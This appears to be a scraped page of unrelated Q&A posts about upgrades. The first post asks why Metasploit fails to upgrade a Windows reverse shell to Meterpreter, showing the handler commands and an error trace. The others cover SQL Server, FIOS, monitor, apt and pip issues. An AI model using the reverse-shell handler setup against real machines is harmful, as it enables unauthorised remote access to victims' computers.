Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like to the rest then I can add more in later

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look
at the script I can upload it to github and share the link(thought its nothing special, I’d prefer to send the link privately to keep the script as less spread as possible).

Exact Steps I took:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LPORT 549 
LPORT => 443
msf5 exploit(multi/handler) > set LHOST
msf5 exploit(multi/handler) > run

(*) Started reverse TCP handler on 
(*) Command shell session 1 opened ( -> at 2020-05-30 22:31:25 -0400

Login: password
You have a shell have fun #> background

Background session 1? (y/N)  y
msf5 exploit(multi/handler) > sessions -u 1
(*) Executing 'post/multi/manage/shell_to_meterpreter' on session(s): (1)

The Issue:

(*) Upgrading session ID: 1
(*) Starting exploit/multi/handler
(*) Started reverse TCP handler on 
(-) Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
(-) Call stack:
(-)   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
(-)   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
(-)   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec'
(-)   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?'
(-)   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'

Note: I have taken a look at some of the files, but they seem to be coded in ruby(something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seems to be similar issues posted on github if it helps.

Upgrading SQL Server from 2008 R2 to 2014 for SharePoint 2013

Hi SharePoint Experts,

I would like to ask your advise. There is a planned upgrade of SQL Server from 2008 R2 (server will be decommissioned) to a new server with SQL 2014. What’s the latest Cumulative Updates that needs to be installed which supports SQL Server 2014? How should I install them? As far as I know the patch has to be installed sequentially but I don’t know which patch should I start installing.

Should you need further details, please advise so that I could supply the other information relevant for my inquiry.

Thank you.

Does upgrading FIOS 50/50 to 200/200 Internet Plan and newer router require replacing Coax cable with Ethernet

I have the Verizon Fios 50/50 Internet plan and an ActionTec MI424-WR router with a Coax input. I want to upgrade to THE Verizon 200/200 PLAN and a faster router. Do I need to rewire from Coax to Ethernet to get the higher speed? If so, does Verizon do the rewiring for free?

display – Screen tearing after upgrading monitor

Today I got an LG 24MK430H and I am experiencing screen tearing when playing videos at 1080p on YouTube. My GPU is an AMD Radeon R7 200 Series (pretty old).

I wanted to know if this could be due to the GPU being old, or if the monitor is not working properly. I don’t have other computers or HDMI monitors to try if the error persists with other pieces of hardware. So can the screen tearing happend even if the monitor is fine?

apt – xdg-desktop-portal-gtk conflict after upgrading to Ubuntu 20.04

In my Ubuntu 20.04, when I execute sudo apt update && sudo apt upgrade, apt informs me that the package xdg-desktop-portal-gtk cannot be updated.
As a consequence, if I try sudo apt reinstall xdg-desktop-portal-gtk I get the message (in italian, but you can wasily imagine what it means):

xdg-desktop-portal-gtk : Dipende: libgnome-desktop-3-18 (>= 3.17.92) ma non è installabile

If I run sudo apt list -ua I get:

xdg-desktop-portal-gtk/eoan 1.7.1-flatpak1~eoan amd64 (aggiornabile da: 1.6.0-1build1)
xdg-desktop-portal-gtk/focal,now 1.6.0-1build1 amd64 (installato, aggiornabile a: 1.7.1-flatpak1~eoan)

While the output of apt-cache policy xdg-desktop-portal-gtk is:

  Installato: 1.6.0-1build1
  Candidato:  1.7.1-flatpak1~eoan
  Tabella versione:
     1.7.1-flatpak1~eoan 500
        500 eoan/main amd64 Packages
 *** 1.6.0-1build1 500
        500 focal/main amd64 Packages
        100 /var/lib/dpkg/status

Flatpak is installed from its official PPA.

How can I solve the conflict? Is there a chance to “block” one repository for this specific package in order to get it from the other one? If yes, which is the version that I should prefer? Thanks in advance

Library – Error after upgrading the PIP version – Python

I have updated the pip version on my computer and now when I install a library I get the following error:

WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
Requirement already satisfied: pip in c:usersadminappdataroamingpythonpython38site-packages (20.1)
Could not build wheels for pip, since package 'wheel' is not installed.

I have already tried to revert to the previous version, but I was unsuccessful. Could someone help me?